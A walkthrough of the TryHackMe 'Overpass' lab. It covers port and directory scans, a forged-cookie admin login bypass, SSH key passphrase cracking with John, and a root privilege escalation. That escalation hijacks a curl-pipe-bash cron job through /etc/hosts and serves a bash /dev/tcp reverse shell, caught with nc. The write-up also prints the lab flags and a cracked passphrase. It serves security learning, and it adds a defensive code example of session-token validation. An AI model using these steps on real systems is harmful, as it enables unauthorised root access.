Room Link : https://tryhackme.com/room/overpass
STEP1
nmap -p- -sSV 10.10.101.201 -Pn -A -T4
FINDING
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
-----------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.101.201/
FINDING
== DIRECTORY: http://10.10.101.201/aboutus/
+ http://10.10.101.201/admin (CODE:301|SIZE:42)
== DIRECTORY: http://10.10.101.201/css/
== DIRECTORY: http://10.10.101.201/downloads/
== DIRECTORY: http://10.10.101.201/img/
+ http://10.10.101.201/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/aboutus/ ----
+ http://10.10.101.201/aboutus/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/css/ ----
+ http://10.10.101.201/css/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/downloads/ ----
+ http://10.10.101.201/downloads/index.html (CODE:301|SIZE:0)
+ http://10.10.101.201/downloads/src (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/img/ ----
+ http://10.10.101.201/img/index.html (CODE:301|SIZE:0)
-----------------------------------------------------------------------------------------------
STEP3
http://10.10.101.201/admin
Inspect the page source of /admin: it loads a login.js file.
Open login.js and read it.
FINDING
async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}
The client stores whatever /api/login returns as a cookie named SessionToken and then loads /admin.
Nothing on the client ties that value to a real session, so the question is whether the server checks the value at all.
Setting a SessionToken cookie ourselves, with any value, tests exactly that.
-----------------------------------------------------------------------------------------------
STEP4
install the Cookie-Editor extension in the browser
https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/?utm_campaign=external-cookie-editor.com
on the /admin login page, add a cookie named SessionToken with an arbitrary value (this is the cookie login.js would have set from the server's response)
refresh the login page and you are logged in without credentials: the server accepts any SessionToken value without validating it
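The bypass in steps 3 and 4 only works because the server never checks what the SessionToken cookie contains. The following is an added example (not the Overpass application's own code) that models the presence-only check the observed behaviour implies, beside a check that validates the token against a server-side store. The session store, function names and the sample cookie headers are all constructed for illustration.

```python
"""Presence-only vs. validated session cookie checks.

Added example, not code from the Overpass room or the target application.
It models a server whose /admin handler only tests that a SessionToken
cookie exists (consistent with step 4: any value logs you in) next to one
that validates the value against tokens it actually issued.
"""
import secrets
from http.cookies import SimpleCookie

# Hypothetical in-memory session store: token -> username.
# A real server would populate this when /api/login succeeds.
SESSIONS = {}


def issue_token(username: str) -> str:
    """Mint a random, unguessable session token and remember its owner."""
    token = secrets.token_hex(32)
    SESSIONS[token] = username
    return token


def parse_cookie_header(header: str) -> dict:
    """Parse a raw Cookie request header ("a=1; b=2") into a dict."""
    jar = SimpleCookie()
    jar.load(header or "")
    return {name: morsel.value for name, morsel in jar.items()}


def is_authenticated_vulnerable(cookie_header: str) -> bool:
    """Presence check only: a SessionToken cookie with any value passes.

    This is the flaw the Cookie-Editor trick exploits. The value never
    gets compared against anything the server issued.
    """
    return "SessionToken" in parse_cookie_header(cookie_header)


def is_authenticated_fixed(cookie_header: str) -> bool:
    """Accept the cookie only if its value is a token the server issued."""
    token = parse_cookie_header(cookie_header).get("SessionToken")
    if not token:
        return False
    # Constant-time comparison against each issued token, so a forged
    # value cannot be refined byte by byte from response timing.
    candidate = token.encode()
    return any(
        secrets.compare_digest(candidate, known.encode()) for known in SESSIONS
    )


if __name__ == "__main__":
    forged = "SessionToken=anything"          # constructed forged cookie
    print("vulnerable accepts forged cookie:", is_authenticated_vulnerable(forged))
    print("fixed accepts forged cookie:     ", is_authenticated_fixed(forged))
    real = f"SessionToken={issue_token('james')}"
    print("fixed accepts issued token:      ", is_authenticated_fixed(real))
```

The fix is not the constant-time compare on its own; it is that the server consults its own record of issued tokens instead of trusting the client to present one.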
-----------------------------------------------------------------------------------------------
STEP5
the admin page shows an SSH private key for the user James; copy it into a file called "ovp.txt"
convert the key into a John-crackable hash with ssh2john (it writes to stdout, so redirect into a file), then crack the passphrase with rockyou
cd /usr/share/john
./ssh2john.py /root/Desktop/ovp.txt > /root/Desktop/ovpcrack
john /root/Desktop/ovpcrack --wordlist=/usr/share/wordlists/rockyou.txt
FINDING
james13 (the passphrase protecting the key)
-----------------------------------------------------------------------------------------------
STEP6
rename ovp.txt to ovp
chmod 600 ovp (ssh refuses a private key that is group- or world-readable)
ssh james@10.10.101.201 -i ovp
enter the key passphrase when prompted: james13
-----------------------------------------------------------------------------------------------
STEP7
ls -la
cat user.txt
FINDING
thm{65c1aaf000506e56996822c6281e6bf7}
-----------------------------------------------------------------------------------------------
STEP8
cat /etc/crontab
FINDING
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
every minute root fetches a script over plain HTTP from overpass.thm and pipes it straight into bash
whoever controls how overpass.thm resolves on the target controls what root executes
-----------------------------------------------------------------------------------------------
STEP9
on the target, first confirm /etc/hosts is writable by james: ls -l /etc/hosts
nano /etc/hosts
10.17.65.196 overpass.thm
replace the IP with your attacker IP, so overpass.thm now resolves to your machine
save and exit nano: Ctrl+X, then Y, then Enter
-----------------------------------------------------------------------------------------------
STEP10
on the attacker machine, recreate the exact path the cron job requests, relative to the directory you will serve from (note it is "downloads", matching the crontab entry)
mkdir -p ~/Desktop/downloads/src
write ~/Desktop/downloads/src/buildscript.sh:
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.17.65.196/4444 0>&1"
the IP is your attacker IP, the same one you put in /etc/hosts on the target
save it
-----------------------------------------------------------------------------------------------
STEP11
from the directory that contains downloads/ (here ~/Desktop), start a web server on port 80, since the cron job fetches over plain HTTP with no port
python3 -m http.server 80
open a nc listener in a new terminal
nc -nvlp 4444
the cron job runs every minute, so within a minute or two the listener receives a reverse shell running as root
-----------------------------------------------------------------------------------------------
STEP12
in the reverse shell
ls -la
cat root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}
whoami
root
-----------------------------------------------------------------------------------------------